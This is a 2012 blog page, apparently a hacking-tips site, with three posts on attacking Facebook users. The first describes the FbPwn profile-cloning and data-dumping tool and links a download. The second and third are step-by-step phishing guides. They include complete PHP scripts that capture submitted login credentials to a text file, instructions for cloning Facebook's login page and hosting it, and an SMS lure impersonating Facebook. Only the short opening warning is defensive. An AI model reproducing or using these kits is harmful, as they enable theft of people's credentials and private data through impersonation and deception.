Tuesday, 16 October 2012

FB Profile hacking

<data:blog.pageName/> - <data:blog.title/> <data:blog.pageTitle/>


Friends, if you get invitation from stranger in facebook, don't accept it. Even if you know the person, please verify whether profile is real or not. A new hacking tool is available that will send friend request to you. If you accept, it can steal all info ,photos,friend list from you. Think twice before accepting invitation.
FbPwn: A cross-platform Java based Facebook profile dumper, sends friend requests to a list of Facebook profiles, and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information,photos and friend list to a local folder.


Usage

A typical scenario is to gather the information from a user profile. The plugins are just a series of normal operations on FB, automated to increase the chance of you getting the info.

Typically, first you create a new blank account for the purpose of the test. Then, the friending plugin works first, by adding all the friends of the victim (to have some common friends). Then the clonning plugin asks you to choose one of the victims friends. The cloning plugin clones only the display picture and the display name of the chosen friend of victim and set it to the authenticated account. Afterwards, a friend request is sent to the victim's account. The dumper polls waiting for the friend to accept. As soon as the victim accepts the friend request, the dumper starts to save all accessable HTML pages (info, images, tags, ...etc) for offline examining.

After a a few minutes, probably the victim will unfriend the fake account after he/she figures out it's a fake, but probably it's too late!


ModulesDescription:
All modules work on a selected profile URL (we'll call him bob), using a valid authenticated account (we'll call him mallory).

FBPwn modules are:

- AddVictimFriends: Request to add some or all friends of bob to increase the chance of bob accepting any future requests, after he finds that you have common friends.

- ProfileCloner: A list of all bob's friends is displayed, you choose one of them (we'll call him andy). FBPwn will change mallory's display picture, and basic info to match andy's. This will generate more chance that bob accepts requests from mallory as he thinks he is accepting from andy. Eventually bob will realize this is not andy's account, but probably it would be too late as all his info are already saved for offline checking by mallory.

- CheckFriendRequest: Check if mallory is already friend of bob, then just end execution. If not, the module tries to add bob as as a friend and poll waiting for him to accept. The module will not stop executing until the friend request is accepted.

- DumpFriends: Accessable friends of bob is saved for offline viewing. The output of the module depends on other modues, if mallory is not a friend of bob yet, the data might not be accessable and nothing will be dumped.

- DumpImages: Accessable images (tagged and albums) are saved for offline viewing. Same limitations of dump friends applies.

- DumpInfo: Accessable basic info are saved for offline viewing. Same limitations of dump friends applies.

Download Link : http://code.google.com/p/fbpwn/downloads/list
What is my IP address?

Hack fb account by phishing

<data:blog.pageName/> - <data:blog.title/> <data:blog.pageTitle/>
HOW TO DO PHISHING ??

Its done in 2 phases

phase 1: creating fake website loginpage.

phase 2: uploading our pages in webhosting sites and sending fake login page link to your beloved ones

step by step guide to hack facebook :

step 1:: go to www.facebook.com
right click and click view page source

step 2: copy all the code by pressing (ctrl+a ) , paste it in a notepad

step 3: Now press (ctrl +f) , search for "action =" in that code

step 4: change action = "1.php"
(remove old link and keep 1.php instead of facebook link)

step 5: save notepad as index.html

step 6: copy the below code in another notepad and save as "1.php"

code :

<?php
header("Location: https://accounts.google.com/ ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Note : this will redirect your fake facebook page to original gmail page after ur enemy gets phished

step 7: now upload them in any webhosting site.

few webhosting sites :

http://x10hosting.com/
http://www.110mb.com/
http://www.doteasy.com/
http://www.freehostia.com/
http://www.awardspace.com/
http://www.000webhost.com/

step 8: after creating account upload our files index.html and 1.php

now send the fake login page link to the person whom you wanna hack

SMS Phishing

 SMS Phishing ??????
What happens?
Victim receives a sms on his mobile apparently from facebook asking to try out new version of facebook. A link is provided in the sms. The victim opens the link, sees the facebook login page. He makes the login and it shows username/password is wrong. He gets phished...

To proceed ahead, you need to have a web server running on your computer connected to internet and mobile number of the victim.

Process:

SETTING UP YOUR PHISHING PAGE.
Go to http://m.facebook.com/ and copy the source code. Place it your web server's public html folder with ".htm" as extension. Open this html file in notepad and go to the form tag. In that, replace the form method from POST to GET. Change the form action value to write.php (you can change the name if you want). Rename the file as "index.htm". Create another file and name it as "write.php". Open write.php and copy the following content to the same. Save it.

Code:

<?php
header("Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6");
$handle = fopen("pswd.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Also create another file pswd.txt and leave it as it is. This is the file where our usernames and passwords are getting stored.
You can store these files in any directory under public html. Remember to keep the name of directory something like facebook or similar.
Now start the server.

CHECKING IF OUR PHISHING PAGE IS WORKING.
go to cmyip.com to know your ip address. Paste this ip address in address bar. You should see your phishing page or your default index.htm(if the files are stored in any directory under public html). If not, following maybe the reasons for it:
1. You maybe behind a router. So, you need to open router's settings and enable port forwarding to your machine.
2. Your server maybe configured not to allow any outside connections. So, check out access settings and enable outside connections.
3. Your server may not be running properly.
Now, you need to navigate to the directory in which our phishing files are stored. for example, my files are in /smsphish under public html. So, i'll navigate to...
http://myipaddress/smsphish/
There you can see the fake login of facebook. You can enter any fake stuff in username and password field. Press enter. It should redirect you to the actual facebook mobile site. Now, open our pswd.txt file and see if our entered details are logged there. If they are, our work is mostly done. if they are not, check that you have made necessary changes in index.htm and the write.php is not tampered.
Now nearly 90% work is done. We move to the last step...

SENDING THE SMS.
Now you have to find free smsing sites which do not require to register. These sites use their own number for sending messeages. You can find many such sites. One word: Google. Now here comes our social engineering techniques. Just type the message like "Experience the brand new, more secure version of facebook, simply follow the link,.. blah blah" and give link to our phishing page. A sample message would look like this.

Quote
Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://youripaddress/yourdirectory/
-Facebook development team.

You can think of many more luring techniques... just think!
Enter the victim's mobile number and send the message! (recommended use proxy) If he opens the message and link, he will see the normal facebook mobile login and if he enters the correct details, our phishing worked! just keep watch on pswd.txt for their details!
Note: Be careful when running server!